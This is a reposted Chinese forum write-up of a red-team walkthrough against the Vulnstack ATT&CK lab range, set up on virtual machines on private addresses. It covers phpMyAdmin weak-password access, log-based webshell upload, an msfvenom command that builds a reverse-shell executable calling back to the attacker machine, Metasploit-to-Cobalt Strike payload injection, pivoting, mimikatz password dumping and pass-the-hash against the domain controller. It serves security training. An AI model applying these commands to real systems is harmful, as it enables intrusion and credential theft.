ATT&CK红队实战靶场初探（一）

1337163122 · 发表于 2021-7-31 21:16:46

ATT&CK红队实战靶场初探（一）[url=]F12sec[/url] 今天
以下文章来源于广软NSDA安全团队，作者青丝未散

广软NSDA安全团队
技术分享，感谢关注
一、环境配置
靶机下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2

攻击示意图：

靶机统一使用虚拟机搭建

web服务器：windows7 ip：192.168.52.143/192.168.154.152

域成员：windows server 2003 ip：192.168.52.141

域控：windows server 2008 ip：192.168.52.138

攻击机：kali ip：192.168.154.146

二、外网打点
nmap扫描ip，看一下开了哪些端口

开了80和3306，访问80

是个探针，知道网站路径和php版本信息

上dirsearch扫一下目录

有phpMyAdmin

试下弱口令,root/root进去了

然后就是getshell，这里参考：https://cloud.tencent.com/developer/article/1540506，用的是日志getshell

写完shell蚁剑连上去，成功getshell

三、内网渗透
1、用msf生成exe上线，联动cs
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe

msf设置

通过蚁剑上传木马，执行

成功得到session

打开cs，设置监听器

在msf中使用exploit/windows/local/payload_inject模块，session设置为刚获得的session

set payload windows/meterpreter/reverse_http

执行，cs成功上线
2、信息收集
(1)mimikatz提取账号明文密码

(2)post/windows/gather/enum_applications模块获取软件列表

(3)get_local_subnets获取子网信息+内网流量转发（msf+proxychains）

获得内网网段为192.168.52.0/24

run autoroute -s 192.168.52.0/24

添加路由让msf可以扫描网段

msf运行socks4a模块，并且修改/etc/proxychains.conf的最后一行为相对应的代理端口

(4)arp扫描内网存活主机

(5）PTH攻击拿下域控

		自动登录	找回密码
密码			立即注册